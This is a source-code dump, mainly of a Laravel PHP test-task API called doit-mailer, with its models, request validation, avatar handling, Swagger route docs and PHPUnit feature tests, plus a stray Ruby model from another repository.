] | 1 | PHP | ngyuki-sandbox/travis-sandbox | 4a90cf60b81e6033f24a6c663b8c96abf99ef3cb | c029ab59ae9d42148937b66f216971f67a525c96 |
refs/heads/master | <repo_name>sanrodari/users_gem<file_sep>/app/models/role.rb
class Role < ActiveRecord::Base
attr_accessible :name, :description
validates :name, presence: true, length: { maximum: 50 }
has_and_belongs_to_many :users
end
| 00e8f99cd04e349145e8198be10ecbb9742773ee | [
"Ruby"
] | 1 | Ruby | sanrodari/users_gem | a499d2f4f7f11b2f1753a994aafc3facd9fb81f8 | 541372b374e57af75308425fca45f6e9b63cc97f |
refs/heads/master | <repo_name>VBetsun/doit-mailer<file_sep>/app/Models/User.php
<?php
declare(strict_types=1);
namespace App\Models;
use Illuminate\Database\Eloquent\Relations\HasMany;
use Illuminate\Database\Eloquent\SoftDeletes;
use Illuminate\Notifications\Notifiable;
use Illuminate\Foundation\Auth\User as Authenticatable;
/**
* Class User
* @package App\Models
* @property int $id
* @property string $email
* @property string $password
* @property string $api_token
* @property \Carbon\Carbon|null $deleted_at
* @property \Carbon\Carbon|null $updated_at
* @property \Carbon\Carbon|null $created_at
* @property \Illuminate\Database\Eloquent\Collection|\App\Models\UserAvatar[] $avatars
* @property \Illuminate\Database\Eloquent\Collection|\App\Models\UserAvatar[] $thumbnails
* @mixin \Eloquent
*/
class User extends Authenticatable
{
use Notifiable, SoftDeletes;
public static function boot()
{
parent::boot();
static::creating(function ($model) {
$model->attributes['api_token'] = static::generateToken();
});
}
/**
* The attributes that are mass assignable.
*
* @var array
*/
protected $fillable = [
'email',
'password'
];
/**
* The attributes that should be hidden for arrays.
*
* @var array
*/
protected $hidden = [
'password',
'api_token',
'deleted_at',
'updated_at',
'created_at'
];
/**
* @return HasMany
*/
public function avatars(): HasMany
{
return $this->hasMany(UserAvatar::class)
->where('type', '=', UserAvatar::TYPE_MAIN)
->orderBy('created_at', 'DESC')
;
}
/**
* @return HasMany
*/
public function thumbnails(): HasMany
{
return $this->hasMany(UserAvatar::class)
->where('type', '=', UserAvatar::TYPE_THUMBNAIL)
->orderBy('created_at', 'DESC')
;
}
/**
* @return string
*/
public function getAvatar(): string
{
$link = 'default.png';
if ($this->avatars->isNotEmpty()) {
$image = $this->avatars()->first();
$link = $image->path . $image->name;
}
return sprintf('%s/storage/%s', config('app.url'), $link);
}
/**
* @return string
*/
public function getAvatarThumbnail(): string
{
$link = 'default-thumbnail.png';
if ($this->thumbnails->isNotEmpty()) {
$image = $this->thumbnails()->first();
$link = $image->path . $image->name;
}
return sprintf('%s/storage/%s', config('app.url'), $link);
}
/**
* @return string
*/
private static function generateToken(): string
{
return str_random(60);
}
}
<file_sep>/app/Providers/GithubUsersServiceProvider.php
<?php
declare(strict_types=1);
namespace App\Providers;
use App\Handlers\GithubUsersHandler;
use Illuminate\Support\ServiceProvider;
/**
* Class GithubUsersServiceProvider
* @package App\Providers
*/
class GithubUsersServiceProvider extends ServiceProvider
{
/**
* Indicates if loading of the provider is deferred.
*
* @var bool
*/
protected $defer = true;
/**
* Register services.
*
* @return void
*/
public function register()
{
$this->app->singleton(GithubUsersHandler::class, function ($app, $params) {
return new GithubUsersHandler($params['usernames']);
});
}
/**
* Get the services provided by the provider.
*
* @return array
*/
public function provides()
{
return [GithubUsersHandler::class];
}
}
<file_sep>/tests/Feature/RegisterTest.php
<?php
declare(strict_types=1);
namespace Tests\Feature\Common;
use Tests\TestCase;
/**
* Class RegisterTest
* @package Tests\Feature\Common
*/
class RegisterTest extends TestCase
{
private $url = '/api/v1/register';
private const CORRECT_RESPONSE_STRUCTURE = [
'id',
'email',
'token',
'avatar',
];
public function testCorrectRegister()
{
$email = '<EMAIL>';
$body = [
'email' => $email,
'password' => '<PASSWORD>'
];
$response = $this->json('POST', $this->url, $body);
$response->assertStatus(201)
->assertJsonStructure(static::CORRECT_RESPONSE_STRUCTURE)
;
$this->assertDatabaseHas('users', compact('email'));
}
public function testRestrictRegisterWithNotValidEmail()
{
$body = [
'email' => $this->getInvalidField(),
'password' => '<PASSWORD>'
];
$response = $this->json('POST', $this->url, $body);
$response->assertStatus(422)
->assertJson([
'title' => 'Validation Failed',
'detail' => [
'email' => ['The email must be a valid email address.']
],
'status' => 422,
])
;
}
public function testRestrictRegisterWithExistedEmail()
{
$body = [
'email' => '<EMAIL>',
'password' => '<PASSWORD>'
];
$response = $this->json('POST', $this->url, $body);
$response->assertStatus(422)
->assertJson([
'title' => 'Validation Failed',
'detail' => [
'email' => ['The email has already been taken.']
],
'status' => 422,
])
;
}
public function testRestrictRegisterWithEmptyData()
{
$body = [
'email' => $this->getEmptyField(),
'password' => $this->getEmptyField()
];
$response = $this->json('POST', $this->url, $body);
$response->assertStatus(422)
->assertJson([
'title' => 'Validation Failed',
'detail' => [
'email' => ['The email field is required.'],
'password' => ['<PASSWORD>.']
],
'status' => 422,
])
;
}
}
<file_sep>/app/Traits/CurlTrait.php
<?php
declare(strict_types=1);
namespace App\Traits;
/**
* Trait CurlTrait
* @package App\Traits
*/
trait CurlTrait
{
/**
* @param $url
* @return mixed
*/
private function sendGetRequest($url)
{
$curl = curl_init();
$headers[] = $this->getHeaders();
curl_setopt_array($curl, [
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_URL => $url,
CURLOPT_HTTPHEADER => $headers,
CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
]);
$response = curl_exec($curl);
curl_close($curl);
return $response;
}
/**
* @return string
* @throws \Exception
*/
private function getHeaders(): string
{
$githubToken = config('app.github_token');
if(!$githubToken){
throw new \Exception('GitHub token not found.');
}
return sprintf('Authorization: token %s', config('app.github_token'));
}
}<file_sep>/app/Http/Controllers/Api/MailController.php
<?php
declare(strict_types=1);
namespace App\Http\Controllers\Api;
use Mail;
use App\Mail\WeatherForecast;
use App\Handlers\GithubUsersHandler;
use App\Http\Controllers\Controller;
use App\Http\Requests\Api\GithubMailRequest;
use Symfony\Component\CssSelector\Exception\InternalErrorException;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;
/**
* Class MailController
* @package App\Http\Controllers\Api
*/
class MailController extends Controller
{
/**
* @param GithubMailRequest $request
* @return \Illuminate\Http\JsonResponse
* @throws BadRequestHttpException
* @throws InternalErrorException
*/
public function byGithubUsernames(GithubMailRequest $request)
{
$message = $request->input('message');
$usernames = $request->input('usernames');
$githubUsersHandler = app()->make(GithubUsersHandler::class, compact('usernames'));
$users = $githubUsersHandler->handle();
$this->sendWeatherEmails($users, $message);
return response()->json(['message' => 'All emails were sent successfully']);
}
/**
* @param array $users
* @param string $message
*/
private function sendWeatherEmails(array $users, string $message): void
{
foreach ($users as $user) {
Mail::to($user['email'])->send(new WeatherForecast($user['location'], $message));
}
}
}
<file_sep>/routes/api.php
<?php
declare(strict_types=1);
use Swagger\Annotations as SWG;
/**
* @SWG\Swagger(
* schemes={"http"},
* host="doit-mailer.itls-ua.tk",
* basePath="/api/v1/",
* @SWG\SecurityScheme(
* securityDefinition="default",
* type="apiKey",
* name="Authorization",
* in="header",
* description="
For accessing the API a valid token must be passed
in the desired queries. The following syntax must
be used in the 'Authorization' header :
Bearer {{ token }}"
* ),
* @SWG\Info(
* version="1.0.0",
* title="DOIT Test Task Mailer API",
* description="REST API implementation based on the requirements described in technical specification",
* termsOfService="",
* @SWG\Contact(
* email="<EMAIL>"
* ),
* ),
* @SWG\Definition(
* definition="LoginRequest",
* required={"email", "<PASSWORD>"},
* @SWG\Property(property="email", type="string", format="email"),
* @SWG\Property(property="password", type="string", format="password"),
* ),
* @SWG\Definition(
* definition="GithubMailRequest",
* required={"usernames", "message"},
* @SWG\Property(
* property="usernames",
* type="array",
* @SWG\Items(type="string")
* ),
* @SWG\Property(property="message", type="string"),
* ),
* @SWG\Definition(
* definition="LoginResponse",
* @SWG\Property(property="token", type="string"),
* @SWG\Property(
* property="avatar",
* @SWG\Property(property="main", type="string"),
* @SWG\Property(property="thumbnail", type="string"),
* ),
* ),
* @SWG\Definition(
* definition="RegisterResponse",
* @SWG\Property(property="id", type="number"),
* @SWG\Property(property="email", type="string"),
* @SWG\Property(property="token", type="string"),
* @SWG\Property(
* property="avatar",
* @SWG\Property(property="main", type="string"),
* @SWG\Property(property="thumbnail", type="string"),
* ),
* ),
* @SWG\Definition(
* definition="Error",
* @SWG\Property(property="title", type="string", description="User friendly error"),
* @SWG\Property(property="detail", type="any", description="Error details"),
* @SWG\Property(property="status", type="number", description="HTTP status code"),
* ),
* )
*/
Route::group(['prefix' => 'v1', 'namespace' => 'Api'], function () {
/**
* @SWG\Post(
* path="/login",
* operationId="apiLogin",
* tags={"Security"},
* summary="Sign in user in the system",
* description="Returns token and link to the avatar",
* @SWG\Parameter(
* name="Body",
* in="body",
* required=true,
* @SWG\Schema(ref="#/definitions/LoginRequest"),
* ),
* @SWG\Response(
* response=200,
* description="successful operation",
* examples={
* "application/json": {
* "token": "<KEY>",
* "avatar": {
* "main": "APP_URL/storage/default.png",
* "thumbnail": "APP_URL/storage/default-thumbnail.png"
* },
* }
* },
* @SWG\Schema(ref="#/definitions/LoginResponse"),
* ),
* @SWG\Response(
* response=404,
* description="Record Not Found",
* examples={
* "application/json": {
* "title": "Record not found",
* "detail": "The user with email: <EMAIL> doesn't exist!",
* "status" : 404
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* @SWG\Response(
* response=405,
* description="Method Not Allowed",
* examples={
* "application/json": {
* "title": "Method Not Allowed",
* "detail": {"Allow": "POST"},
* "status" : 405
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* @SWG\Response(
* response=422,
* description="Validation Error",
* examples={
* "application/json": {
* "title": "Validation Failed",
* "detail": {
* "email": {
* "The email must be a valid email address."
* }
* },
* "status" : 422
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* )
*/
Route::post('login', 'SecurityController@login')->name('api_login');
/**
* @SWG\Post(
* path="/register",
* operationId="apiRegister",
* tags={"Security"},
* summary="Sign up user in the system",
* description="Returns all user data",
* @SWG\Parameter(
* name="email",
* in="formData",
* description="Email address",
* required=true,
* type="string",
* format="email"
* ),
* @SWG\Parameter(
* name="password",
* in="formData",
* description="Password",
* required=true,
* type="string",
* format="password"
* ),
* @SWG\Parameter(
* name="avatar",
* in="formData",
* description="Avatar image",
* required=false,
* type="file",
* ),
* @SWG\Response(
* response=201,
* description="Successful Operation",
* examples={
* "application/json": {
* "id": 2,
* "email": "<EMAIL>",
* "token": "<KEY>",
* "avatar": {
* "main": "APP_URL/storage/default.png",
* "thumbnail": "APP_URL/storage/default-thumbnail.png"
* },
* }
* },
* @SWG\Schema(ref="#/definitions/RegisterResponse"),
* ),
* @SWG\Response(
* response=405,
* description="Method Not Allowed",
* examples={
* "application/json": {
* "title": "Method Not Allowed",
* "detail": {"Allow": "POST"},
* "status" : 405
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* @SWG\Response(
* response=422,
* description="Validation Error",
* examples={
* "application/json": {
* "title": "Validation Failed",
* "detail": {
* "email": {
* "The email must be a valid email address."
* }
* },
* "status" : 422
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* @SWG\Response(
* response=500,
* description="Internal Server Error",
* examples={
* "application/json": {
* "title": "Internal Server Error",
* "detail": "The image cannot be decoded",
* "status" : 500
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* )
*/
Route::post('register', 'SecurityController@register')->name('api_register');
/**
* @SWG\Post(
* path="/mail/github",
* operationId="mailGithub",
* tags={"Mail"},
* summary="Emails to GitHub Users",
* description="Sending emails to GitHub Users by their usernames",
* security={{"default": {}}},
* @SWG\Parameter(
* name="Body",
* in="body",
* required=true,
* @SWG\Schema(ref="#/definitions/GithubMailRequest"),
* ),
* @SWG\Response(
* response=200,
* description="successful operation",
* examples={
* "application/json": {
* "message": "All emails were sent successfully"
* }
* },
* @SWG\Schema(ref="#/definitions/LoginResponse"),
* ),
* @SWG\Response(
* response=401,
* description="Not Authorized",
* examples={
* "application/json": {
* "title": "You are not authenticated in the system.",
* "detail": "Check if token exists in 'Authorization' header",
* "status" : 401
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* @SWG\Response(
* response=405,
* description="Method Not Allowed",
* examples={
* "application/json": {
* "title": "Method Not Allowed",
* "detail": {"Allow": "POST"},
* "status" : 405
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* @SWG\Response(
* response=422,
* description="Validation Error",
* examples={
* "application/json": {
* "title": "Validation Failed",
* "detail": {
* "usernames": {
* "The usernames field is required."
* }
* },
* "status" : 422
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* @SWG\Response(
* response=500,
* description="Internal Server Error",
* examples={
* "application/json": {
* "title": "Internal Server Error",
* "detail": "Open Weather Map not reachable",
* "status" : 500
* }
* },
* @SWG\Schema(ref="#/definitions/Error"),
* ),
* ),
*/
Route::group(['middleware' => 'auth:api'], function () {
Route::post('mail/github', 'MailController@byGithubUsernames');
});
});
<file_sep>/app/Handlesrs/AvatarHandler.php
<?php
declare(strict_types=1);
namespace App\Handlers;
use File;
use Image;
use App\Models\User;
use App\Models\UserAvatar;
use Illuminate\Http\UploadedFile;
/**
* Class AvatarHandler
* @package App\Handlers
*/
class AvatarHandler
{
private $file;
private $user;
/**
* AvatarHandler constructor.
* @param UploadedFile $file
* @param User $user
*/
public function __construct(UploadedFile $file, User $user)
{
$this->file = $file;
$this->user = $user;
}
public function handle()
{
list($avatarName, $thumbnailName) = $this->createNamesForAvatars();
list($ownerPath, $savePath) = $this->storeImageInSystem($avatarName);
File::makeDirectory($savePath);
$this->saveAvatarImages($avatarName, $savePath, $thumbnailName);
$this->createUserAvatars($avatarName, $ownerPath, $thumbnailName);
}
/**
* @return array
*/
private function createNamesForAvatars(): array
{
$avatarName = time() . '-' . $this->file->getClientOriginalName();
$thumbnailName = 'thumbnail-' . $avatarName;
return [$avatarName, $thumbnailName];
}
/**
* @param string $avatarName
* @return array
*/
private function storeImageInSystem(string $avatarName): array
{
$this->file->move(storage_path('uploads'), $avatarName);
$id = $this->user->id;
$ownerPath = "users/$id/";
$savePath = storage_path('app/public/' . $ownerPath);
return [$ownerPath, $savePath];
}
/**
* @param string $avatarName
* @param string $savePath
* @param string $thumbnailName
*/
private function saveAvatarImages(string $avatarName, string $savePath, string $thumbnailName): void
{
Image::make(storage_path('uploads/' . $avatarName))
->resize(512, null, function ($constraint) {
$constraint->aspectRatio();
$constraint->upsize();
})
->save($savePath . $avatarName, 100)
;
Image::make(storage_path('uploads/' . $avatarName))
->resize(150, null, function ($constraint) {
$constraint->aspectRatio();
$constraint->upsize();
})
->save($savePath . $thumbnailName, 100)
;
}
/**
* @param string $avatarName
* @param string $ownerPath
* @param string $thumbnailName
*/
private function createUserAvatars(string $avatarName, string $ownerPath, string $thumbnailName): void
{
$this->user->avatars()->create([
'name' => $avatarName,
'type' => UserAvatar::TYPE_MAIN,
'path' => $ownerPath
])
;
$this->user->thumbnails()->create([
'name' => $thumbnailName,
'type' => UserAvatar::TYPE_THUMBNAIL,
'path' => $ownerPath
])
;
}
}<file_sep>/readme.md
## Test task for DOIT Software
### Task
- [x] Provide a link to the Git repo. [GitHub link](https://github.com/VBetsun/doit-mailer)
- [x] Upload the code to any hosting and send an URL for testing.[Hosting link](http://doit-mailer.itls-ua.tk)
- [x] Create API doc.[Documentation link](http://doit-mailer.itls-ua.tk/api/documentation)
### Description
As a user I can:
- [x] Sign up.
- [x] Sign in.
- [x] Enter GitHub usernames and send them a message through email.
### Requirements
- [x] Security implementation based on tokens.
- [x] A response in the JSON format.
- [x] Save avatar + thumbnail during registration.
- [x] The same structure for all the responses.
### Installing
Cloning project:
```
git clone https://github.com/VBetsun/doit-mailer.git /path/to/project
```
Navigate to folder:
```
cd /path/to/project
```
Install packages:
```
composer install
```
Create a symbolic link from "public/storage" to "storage/app/public":
```
php artisan storage:link
```
Give www-data correct permissions for working:
```
./permissions.sh
```
Run migrations & fill DB with fake data
```
php artisan migrate --seed
```
Run tests
```
./vendor/bin/phpunit tests/Feature/
```
Run built-in server:
```
php artisan serve
```
Enjoy on [this url](http://127.0.0.1:8000) :)
<file_sep>/app/Traits/AuthSanitizerTrait.php
<?php
declare(strict_types=1);
namespace App\Traits;
/**
* Trait AuthSanitizerTrait
* @package App\Traits
*/
trait AuthSanitizerTrait
{
use InputCleaner;
public function sanitize()
{
$input = $this->all();
if ($this->filled('email')) {
$input['email'] = $this->clean($input['email']);
}
if ($this->filled('password')) {
$input['password'] = $this->clean($input['password']);
}
$this->replace($input);
}
}
<file_sep>/app/Http/Resources/User.php
<?php
namespace App\Http\Resources;
use Illuminate\Http\Resources\Json\JsonResource;
class User extends JsonResource
{
/**
* Transform the resource into an array.
*
* @param \Illuminate\Http\Request $request
* @return array
*/
public function toArray($request)
{
return [
$this->mergeWhen($request->route()->getName() === 'api_register', [
'id' => $this->id,
'email' => $this->email,
]),
'token' => $this->api_token,
'avatar' => [
'main' => $this->getAvatar(),
'thumbnail' => $this->getAvatarThumbnail()
],
];
}
}
<file_sep>/app/Http/Requests/Api/LoginRequest.php
<?php
declare(strict_types=1);
namespace App\Http\Requests\Api;
use App\Traits\AuthSanitizerTrait;
use Illuminate\Foundation\Http\FormRequest;
/**
* Class LoginRequest
* @package App\Http\Requests\Api
*/
class LoginRequest extends FormRequest
{
use AuthSanitizerTrait;
/**
* Determine if the user is authorized to make this request.
*
* @return bool
*/
public function authorize()
{
return true;
}
/**
* Get the validation rules that apply to the request.
*
* @return array
*/
public function rules()
{
$this->sanitize();
return [
'email' => 'required|string|email|max:255',
'password' => '<PASSWORD>',
];
}
}
<file_sep>/app/Http/Requests/Api/GithubMailRequest.php
<?php
declare(strict_types=1);
namespace App\Http\Requests\Api;
use App\Traits\InputCleaner;
use Illuminate\Foundation\Http\FormRequest;
/**
* Class GithubMailRequest
* @package App\Http\Requests\Api
*/
class GithubMailRequest extends FormRequest
{
use InputCleaner;
/**
* Determine if the user is authorized to make this request.
*
* @return bool
*/
public function authorize()
{
return true;
}
/**
* Get the validation rules that apply to the request.
*
* @return array
*/
public function rules()
{
$this->sanitize();
return [
'usernames' => 'required',
'usernames.*' => 'required|string|min:3',
'message' => 'required|string',
];
}
/**
* @return array
*/
public function messages()
{
return [
'usernames.*.required' => 'No one username in the list can\'t be empty',
];
}
public function sanitize()
{
$input = $this->all();
if ($this->filled('usernames')) {
if (!is_array($input['usernames'])) {
$input['usernames'] = [$this->clean($input['usernames'])];
} else {
$usernames = [];
foreach ($input['usernames'] as $username) {
$usernames[] = $this->clean($username);
}
$input['usernames'] = $usernames;
}
}
if ($this->filled('message')) {
$input['message'] = $this->clean($input['message']);
}
$this->replace($input);
}
}
<file_sep>/database/seeds/UsersTableSeeder.php
<?php
use App\Models\User;
use Illuminate\Database\Seeder;
class UsersTableSeeder extends Seeder
{
/**
* Run the database seeds.
*
* @return void
*/
public function run()
{
$this->createAdmin();
// factory(User::class, 12)->create()->each(function ($user) {
// $user->role()->save(factory(App\Models\Role::class)->make());
// });
}
private function createAdmin()
{
$hasher = app()->make('hash');
User::create([
'email' => '<EMAIL>',
'password' => $hasher->make(<PASSWORD>)
]);
}
}
<file_sep>/database/seeds/DatabaseSeeder.php
<?php
use Illuminate\Database\Seeder;
class DatabaseSeeder extends Seeder
{
private $tables = [
'users',
'user_avatars'
];
/**
* Seed the application's database.
*
* @return void
*/
public function run()
{
$this->cleanDatabase();
$this->call(UsersTableSeeder::class);
}
private function cleanDatabase()
{
$connection = DB::connection()->getPDO()->getAttribute(PDO::ATTR_DRIVER_NAME);
// Disable foreign key checking because truncate() will fail
if ($connection === 'mysql') {
DB::statement('SET FOREIGN_KEY_CHECKS = 0');
} elseif ($connection === 'sqlite') {
DB::statement('PRAGMA foreign_keys = OFF');
} else {
throw new \Exception('Driver not supported.');
}
foreach ($this->tables as $tableName) {
DB::table($tableName)->truncate();
}
// Enable it back
if ($connection === 'mysql') {
DB::statement('SET FOREIGN_KEY_CHECKS = 1');//FOR MYSQL
} elseif ($connection === 'sqlite') {
DB::statement('PRAGMA foreign_keys = ON');//FOR SQLITE
} else {
throw new \Exception('Driver not supported.');
}
}
}
<file_sep>/tests/Feature/GithubMailTest.php
<?php
declare(strict_types=1);
namespace Tests\Feature\Common;
use App\Models\User;
use Tests\TestCase;
/**
* Class GithubMailTest
* @package Tests\Feature\Common
*/
class GithubMailTest extends TestCase
{
private $url;
private $user;
public function setUp()
{
parent::setUp();
$this->url = '/api/v1/mail/github';
$this->user = (new User)->find(1);
}
private const CORRECT_RESPONSE_STRUCTURE = [
'message',
];
public function testSendEmailsByUsernames()
{
$headers = ['Authorization' => "Bearer {$this->user->api_token}"];
$body = [
'usernames' => ['vbetsun'],
'message' => 'Neque porro quisquam est qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit..'
];
$response = $this->json('POST', $this->url, $body, $headers);
$response->assertStatus(200)
->assertJsonStructure(static::CORRECT_RESPONSE_STRUCTURE)
;
}
public function testRestrictSendEmailsWithoutAuth()
{
$response = $this->json('POST', $this->url);
$response->assertStatus(401)
->assertJson([
'title' => 'You are not authenticated in the system.',
'detail' => 'Check if token exists in "Authorization" header',
'status' => 401,
]);
}
public function testRestrictSendEmailsWithEmptyData()
{
$headers = ['Authorization' => "Bearer {$this->user->api_token}"];
$body = [
'usernames' => $this->getEmptyField(),
'message' => $this->getEmptyField()
];
$response = $this->json('POST', $this->url, $body, $headers);
$response->assertStatus(422)
->assertJson([
'title' => 'Validation Failed',
'detail' => [
'usernames' => ['The usernames field is required.'],
'message' => ['The message field is required.']
],
'status' => 422,
])
;
}
}
<file_sep>/app/Handlesrs/GithubUsersHandler.php
<?php
declare(strict_types=1);
namespace App\Handlers;
use App\Traits\CurlTrait;
use Symfony\Component\HttpKernel\Exception\BadRequestHttpException;
/**
* Class GithubUsersHandler
* @package App\Handlers
*/
class GithubUsersHandler
{
use CurlTrait;
private $usernames;
private $validUsers = [];
private $usersWithoutEmail = [];
private $usersWithoutLocation = [];
/**
* GithubUsersHandler constructor.
* @param $usernames
*/
public function __construct(array $usernames)
{
$this->usernames = $usernames;
}
/**
* @return array
*/
public function handle()
{
foreach ($this->usernames as $username) {
list($basicDecodedData, $publicEventsDecodedData) = $this->prepareUserData($username);
if ($this->isGithubUserNotExists($basicDecodedData)) {
throw new BadRequestHttpException(sprintf(
'User with username "%s" doesn\'t exist on GitHub',
$username
));
}
$email = $this->getEmailFromDecodedData($basicDecodedData, $publicEventsDecodedData);
if (!$email) {
$usersWithoutEmail[] = $username;
}
if ($this->isGithubUserWithoutLocation($basicDecodedData)) {
$usersWithoutLocation[] = $username;
}
$this->validUsers[] = [
'email' => $email,
'location' => $basicDecodedData->location
];
}
$this->checkDispatchAbility($this->usersWithoutEmail, $this->usersWithoutLocation);
return $this->validUsers;
}
/**
* @param $username
* @return array
*/
private function prepareUserData($username): array
{
$basicUrl = sprintf('https://api.github.com/users/%s', $username);
$basicData = $this->sendGetRequest($basicUrl);
$publicEventsData = $this->sendGetRequest($basicUrl . '/events/public');
$basicDecodedData = json_decode($basicData);
$publicEventsDecodedData = json_decode($publicEventsData);
return [$basicDecodedData, $publicEventsDecodedData];
}
/**
* @param $basicDecodedData
* @return bool
*/
private function isGithubUserNotExists($basicDecodedData): bool
{
return property_exists($basicDecodedData, 'message') &&
$basicDecodedData->message === 'Not Found';
}
/**
* @param $basicData
* @param $publicEventsData
* @return string|null
*/
private function getEmailFromDecodedData($basicData, $publicEventsData)
{
if ($basicData->email !== null) {
return $basicData->email;
}
foreach ($publicEventsData as $data) {
if (property_exists($data->payload, 'commits')) {
foreach ($data->payload->commits as $commit) {
if ($commit->author->email !== null) {
return $commit->author->email;
}
}
}
}
return null;
}
/**
* @param $basicDecodedData
* @return bool
*/
private function isGithubUserWithoutLocation($basicDecodedData): bool
{
return $basicDecodedData->location === null;
}
/**
* @param array $usersWithoutEmail
* @param array $usersWithoutLocation
* @throws \Exception
*/
private function checkDispatchAbility($usersWithoutEmail, $usersWithoutLocation): void
{
if ($usersWithoutEmail !== []) {
throw new \Exception(sprintf(
'Emails can\'t be sent because the user(s): "%s" didn\'t specify email field',
implode(', ', $usersWithoutEmail)
));
}
if ($usersWithoutLocation !== []) {
throw new \Exception(sprintf(
'Emails can\'t be sent because the user(s): "%s" didn\'t specify location field', implode(', ', $usersWithoutEmail)
));
}
}
}<file_sep>/tests/TestCase.php
<?php
namespace Tests;
use App\Models\User;
use Illuminate\Foundation\Testing\DatabaseMigrations;
use Illuminate\Foundation\Testing\TestCase as BaseTestCase;
abstract class TestCase extends BaseTestCase
{
use CreatesApplication, DatabaseMigrations;
public function setUp()
{
parent::setUp();
\Artisan::call('db:seed');
}
protected function getLongField($length = 170)
{
return str_repeat("a", $length);
}
protected function getEmptyField()
{
return '';
}
protected function getInvalidField()
{
return 'asdasdasd';
}
}
<file_sep>/app/Mail/WeatherForecast.php
<?php
declare(strict_types=1);
namespace App\Mail;
use Illuminate\Bus\Queueable;
use Illuminate\Mail\Mailable;
use Illuminate\Queue\SerializesModels;
use Gmopx\LaravelOWM\LaravelOWM;
/**
* Class WeatherForecast
* @package App\Mail
*/
class WeatherForecast extends Mailable
{
use Queueable, SerializesModels;
public $location;
public $message;
/**
* Create a new message instance.
* @param string $location
* @param string $message
*/
public function __construct(string $location, string $message)
{
$this->location = $location;
$this->message = $message;
}
/**
* Build the message.
*
* @return $this
*/
public function build()
{
$weather = $this->getWeather();
$weatherImage = $this->getWeatherImage($weather->description);
return $this->markdown('emails.weather-forecast', ['weatherImage' => $weatherImage]);
}
/**
* @return \Cmfcmf\OpenWeatherMap\Util\Weather
*/
private function getWeather()
{
$currentLocation = $this->getCurrentLocation();
$owm = new LaravelOWM();
$currentWeather = $owm->getCurrentWeather($currentLocation);
return $currentWeather->weather;
}
/**
* @return array|mixed
*/
private function getCurrentLocation()
{
$currentLocation = explode(' ', $this->location);
return array_pop($currentLocation);
}
/**
* @param string $weather
* @return string
*/
private function getWeatherImage(string $weather): string
{
if ($weather === 'clear sky') {
return 'sun';
} elseif ($weather === 'few clouds') {
return 'cloudy_sun';
} elseif ($weather === 'scattered clouds' || $weather === 'broken clouds') {
return 'cloud';
} elseif ($weather === 'shower rain' || $weather === 'rain') {
return 'rain_cloud';
} elseif ($weather === 'thunderstorm') {
return 'thunder_cloud';
} elseif ($weather === 'snow') {
return 'snow_cloud';
} else {
return 'mist';
}
}
}
<file_sep>/app/Models/UserAvatar.php
<?php
declare(strict_types=1);
namespace App\Models;
use Illuminate\Database\Eloquent\Model;
use Illuminate\Database\Eloquent\Relations\BelongsTo;
/**
* Class UserAvatar
* @package App\Models
* @property int $id
* @property int $user_id
* @property string $name
* @property string $path
* @property \Carbon\Carbon|null $deleted_at
* @property \Carbon\Carbon|null $updated_at
* @property \Carbon\Carbon|null $created_at
* @property-read \App\Models\User $user
* @mixin \Eloquent
*/
class UserAvatar extends Model
{
const TYPE_MAIN = 'main';
const TYPE_THUMBNAIL = 'thumbnail';
/**
* The attributes that are mass assignable.
*
* @var array
*/
protected $fillable = [
'user_id',
'type',
'name',
'path'
];
/**
* The attributes that should be hidden for arrays.
*
* @var array
*/
protected $hidden = [
'deleted_at',
'updated_at',
'created_at'
];
/**
* @return BelongsTo
*/
public function user(): BelongsTo
{
return $this->belongsTo(User::class);
}
/**
* @return string
*/
public function getLink(): string
{
return sprintf('%s/storage/%s', config('app.url'), $this->path . $this->name);
}
}
<file_sep>/permissions.sh
#!/bin/sh
chgrp -R www-data storage bootstrap/cache
chmod -R ug+rwx storage bootstrap/cache
<file_sep>/tests/Feature/LoginTest.php
<?php
declare(strict_types=1);
namespace Tests\Feature\Common;
use Tests\TestCase;
/**
* Class LoginTest
* @package Tests\Feature\Common
*/
class LoginTest extends TestCase
{
private $url = '/api/v1/login';
private const CORRECT_RESPONSE_STRUCTURE = [
'token',
'avatar',
];
public function testCorrectLogin()
{
$body = [
'email' => '<EMAIL>',
'password' => '<PASSWORD>'
];
$response = $this->json('POST', $this->url, $body);
$response->assertStatus(200)
->assertJsonStructure(static::CORRECT_RESPONSE_STRUCTURE)
;
}
public function testRestrictInvalidEmailLogin()
{
$email = '<EMAIL>';
$body = [
'email' => $email,
'password' => '<PASSWORD>'
];
$response = $this->json('POST', $this->url, $body);
$response->assertStatus(404)
->assertJson([
'title' => 'Record not found',
'detail' => sprintf('The user with email: "%s" doesn\'t exist!', $email),
'status' => 404,
])
;
}
public function testRestrictInvalidPasswordLogin()
{
$body = [
'email' => '<EMAIL>',
'password' => '<PASSWORD>'
];
$response = $this->json('POST', $this->url, $body);
$response->assertStatus(422)
->assertJson([
'title' => 'Validation Failed',
'detail' => [
'password' => ['<PASSWORD>!']
],
'status' => 422,
])
;
}
public function testRestrictLoginWithNotValidEmail()
{
$body = [
'email' => $this->getInvalidField(),
'password' => '<PASSWORD>'
];
$response = $this->json('POST', $this->url, $body);
$response->assertStatus(422)
->assertJson([
'title' => 'Validation Failed',
'detail' => [
'email' => ['The email must be a valid email address.']
],
'status' => 422,
])
;
}
public function testRestrictLoginWithEmptyData()
{
$body = [
'email' => $this->getEmptyField(),
'password' => $this->getEmptyField()
];
$response = $this->json('POST', $this->url, $body);
$response->assertStatus(422)
->assertJson([
'title' => 'Validation Failed',
'detail' => [
'email' => ['The email field is required.'],
'password' => ['<PASSWORD>.']
],
'status' => 422,
])
;
}
}
<file_sep>/app/Traits/InputCleaner.php
<?php
declare(strict_types=1);
namespace App\Traits;
/**
* Trait InputCleaner
* @package App\Traits
*/
trait InputCleaner
